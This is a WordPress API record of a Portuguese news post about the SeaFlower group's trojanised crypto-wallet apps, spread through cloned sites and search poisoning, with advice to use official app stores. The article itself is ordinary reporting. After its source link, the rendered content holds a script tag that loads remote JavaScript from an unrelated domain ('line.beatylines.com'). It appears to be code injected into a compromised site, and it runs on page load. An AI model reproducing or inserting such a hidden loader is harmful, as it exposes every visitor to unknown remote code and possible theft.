{"id":1759,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/hackers-clonam-carteiras-para-roubar-criptomoedas\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"hackers-clonam-carteiras-para-roubar-criptomoedas","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/hackers-clonam-carteiras-para-roubar-criptomoedas\/","title":{"rendered":"hackers clonam carteiras para roubar criptomoedas"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>Especialistas em seguran\u00e7a e tecnologia descobriram uma opera\u00e7\u00e3o em larga escala feita por <a href=\"https:\/\/www.uol.com.br\/tilt\/hacker\/\">hackers<\/a> para roubar criptomoedas. A t\u00e1tica usada envolveu a cria\u00e7\u00e3o de apps falsos que se parecem com carteiras digitais leg\u00edtimas. Ao todo, quatro aplicativos foram falsificados: <a href=\"https:\/\/economia.uol.com.br\/noticias\/reuters\/2022\/05\/18\/coinbase-cria-centro-de-pesquisa-em-criptomoedas-em-meio-a-debate-sobre-regulacao.htm\" target=\"_blank\" rel=\"noopener\">Coinbase<\/a> (maior corretora de criptomoedas dos Estados Unidos), <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/04\/18\/opensea-e-looksrare-conheca-as-plataformas-milionarias-que-negociam-nfts.htm\">MetaMask<\/a>, TokenPocket e imToken.<\/p>\n<p>De acordo com <a href=\"https:\/\/blog.confiant.com\/how-seaflower-%E8%97%8F%E6%B5%B7%E8%8A%B1-installs-backdoors-in-ios-android-web3-wallets-to-steal-your-seed-phrase-d25f0ccdffce\" target=\"_blank\" rel=\"noopener\">informa\u00e7\u00f5es da ag\u00eancia de seguran\u00e7a digital Confiant<\/a>, a atividade criminosa foi detectada em mar\u00e7o, tendo sido executada pelo grupo de cibercriminosos denominado SeaFlower.<\/p>\n<p>Os pesquisadores da organiza\u00e7\u00e3o disseram que essa \u00e9 a amea\u00e7a &#8220;mais tecnologicamente sofisticada&#8221; composta por usu\u00e1rios da <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/bbc\/2022\/01\/13\/o-que-e-web3-que-pode-transformar-a-internet.htm\">web3<\/a> \u2014aposta de evolu\u00e7\u00e3o da internet\u2014 desde o <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/reuters\/2022\/06\/06\/como-a-binance-se-tornou-um-hub-para-hackers-fraudadores-e-traficantes-de-drogas.htm\">grupo Lazarus<\/a>, outra conhecida comunidade de hackers.<\/p>\n<h2>Como o golpe funciona<\/h2>\n<p>Para executar o seu golpe, o grupo de cibercriminosos criou o que se chama de &#8220;<a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/09\/02\/golpe-da-mao-fantasma-virus-brasileiro-que-rouba-conta-bancaria-se-espalha.htm\">trojans<\/a>&#8220;, ou cavalos de Troia, programas maliciosos que se passam por outros, mas que s\u00e3o desenvolvidos para roubar informa\u00e7\u00f5es.<\/p>\n<p>O alvo da c\u00f3pia fake, neste caso, foram apps onde se guardam as criptomoedas compradas pelos usu\u00e1rios. A Confiant informou que os aplicativos s\u00e3o id\u00eanticos aos reais, mas que possuem backdoors que permitem o acesso aos hackers.<\/p>\n<p>Vale esclarecer que &#8220;backdoor&#8221;, em computa\u00e7\u00e3o, s\u00e3o portas de acessos secretas que permitem a outras pessoas a entrada em softwares \u2014da\u00ed o nome em ingl\u00eas, que quer dizer &#8220;porta dos fundos&#8221;.<\/p>\n<h2>Confundindo as buscas<\/h2>\n<p>Para fazer com que propriet\u00e1rios de criptomoedas baixassem os aplicativos falsos, os hackers precisaram antes espalh\u00e1-los para o maior n\u00famero poss\u00edvel deles.<\/p>\n<p>Eles clonaram ent\u00e3o sites leg\u00edtimos dos apps citados, nos quais a \u00fanica op\u00e7\u00e3o de download eram suas falsifica\u00e7\u00f5es.<\/p>\n<p>O grupo tamb\u00e9m se utilizou de t\u00e9cnicas de manipula\u00e7\u00e3o de sistemas e mecanismos de busca. Assim, por exemplo, quando algu\u00e9m digitava o nome &#8220;Coinbase&#8221; em um site como o <a href=\"https:\/\/www.uol.com.br\/tilt\/google\/\">Google<\/a>, uma das primeiras p\u00e1ginas que apareciam era o site falso desenvolvido por eles.<\/p>\n<p>Essas t\u00e9cnicas tamb\u00e9m s\u00e3o chamadas de &#8220;SEO poisoning&#8221;, ou seja, envenenamento de buscas.<\/p>\n<p>O mecanismo de pesquisas mais atingido foi o Baidu, que tem grande p\u00fablico na China, sendo o mais usado no pa\u00eds. Pela linguagem presente no c\u00f3digo de programa\u00e7\u00e3o e por mirar principalmente em servi\u00e7os chineses, acredita-se que o SeaFlower esteja baseado na China.<\/p>\n<p>Os pesquisadores da Confiant encontraram tamb\u00e9m esses aplicativos falsos sendo promovidos em canais de m\u00eddias sociais, f\u00f3runs e &#8220;malvertising&#8221;, nome que se d\u00e1 \u00e0 publicidade online maliciosa, criada com o intuito de enganar e fazer o usu\u00e1rio clicar nela.<\/p>\n<h2>D\u00e1 para se proteger?<\/h2>\n<p>Para entender como o SeaFlower criou uma opera\u00e7\u00e3o t\u00e3o sofisticada, os funcion\u00e1rios da Confiant fizeram engenharia reversa nos aplicativos fake, encontrando c\u00f3digo de programa\u00e7\u00e3o similar em todos eles.<\/p>\n<p>Essa opera\u00e7\u00e3o permitiu a eles entenderem que as t\u00e9cnicas usadas foram muito cuidadosas e levaram tempo de estudo por parte dos hackers.<\/p>\n<p>Segundo a ag\u00eancia, a \u00fanica maneira de se proteger desse tipo de golpe \u00e9 se certificar de que os apps de carteiras digitais utilizados s\u00e3o os oficiais. Para isso, \u00e9 preciso baix\u00e1-los nos sites oficiais dos seus desenvolvedores, bem como nas lojas de aplicativos oficiais, como a <a href=\"https:\/\/www.uol.com.br\/tilt\/app\/ \">App<\/a> Store para dispositivos Apple e a Play Store para dispositivos Android.<\/p>\n<p><em>*Com informa\u00e7\u00f5es do site Bleeping Computer<\/em><\/p>\n<p> Hackers criaram aplicativos falsos que se parecem com carteiras digitais leg\u00edtimas para roubar criptomoedas.       <\/p><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/06\/14\/hackers-clonam-carteiras-digitais-para-roubar-criptomoedas-entenda.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Especialistas em seguran\u00e7a e tecnologia descobriram uma opera\u00e7\u00e3o em larga escala feita por hackers para roubar criptomoedas. A t\u00e1tica usada envolveu a cria\u00e7\u00e3o de apps falsos que se parecem com carteiras digitais leg\u00edtimas. Ao todo, quatro aplicativos foram falsificados: Coinbase (maior corretora de criptomoedas dos Estados Unidos), MetaMask, TokenPocket e imToken. De acordo com informa\u00e7\u00f5es&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1760,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[3029,3278,590,1388,85,3279],"class_list":["post-1759","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-carteiras","tag-clonam","tag-criptomoedas","tag-hackers","tag-para","tag-roubar"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1759","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1759"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1759\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/1760"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1759"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1759"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1759"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}